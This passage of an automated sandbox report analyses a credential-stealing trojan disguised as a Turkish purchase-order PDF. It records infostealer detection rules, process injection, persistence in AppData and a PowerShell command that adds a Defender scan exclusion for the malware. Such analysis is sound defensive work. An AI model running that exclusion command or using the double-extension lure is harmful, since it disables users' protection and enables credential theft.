                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1328454130.00000000050C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1318702019.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1329165179.0000000006220000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1320959148.00000000028D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename960d76e1-393e-4e96-a64a-e2af17492795.exe4 vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1320959148.0000000002851000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename960d76e1-393e-4e96-a64a-e2af17492795.exe4 vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1328797521.0000000005BA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2535482953.00000000009E9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeBinary or memory string: OriginalFilenamePrWF.exe> vs baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 13.2.ctsdvwT.exe.409f328.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.43f9d68.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 13.2.ctsdvwT.exe.40d9f48.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.43bf148.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 12.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.43f9d68.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 13.2.ctsdvwT.exe.40d9f48.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.43bf148.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 13.2.ctsdvwT.exe.409f328.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, roEs93G.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, roEs93G.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, JQn0Aia1.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, JQn0Aia1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, BIfda5lRrt3Eiso9an.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, tiGbCdWd4bev0iB2DA.csSecurity API names: _0020.SetAccessControl
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, tiGbCdWd4bev0iB2DA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, tiGbCdWd4bev0iB2DA.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, BIfda5lRrt3Eiso9an.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, tiGbCdWd4bev0iB2DA.csSecurity API names: _0020.SetAccessControl
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, tiGbCdWd4bev0iB2DA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, tiGbCdWd4bev0iB2DA.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.50e0000.7.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.28b7e4c.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.28a7e34.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/9@1/1
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.logJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMutant created: \Sessions\1\BaseNamedObjects\sIgyAqxTUc
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkkj1iex.1pz.ps1Jump to behavior
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000C.00000002.1548552550.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000C.00000002.1548552550.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000E.00000002.2544912217.0000000002D06000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000E.00000002.2544912217.0000000002D1A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeReversingLabs: Detection: 36%
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeFile read: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess created: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess created: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeSection loaded: sspicli.dllJump to behavior
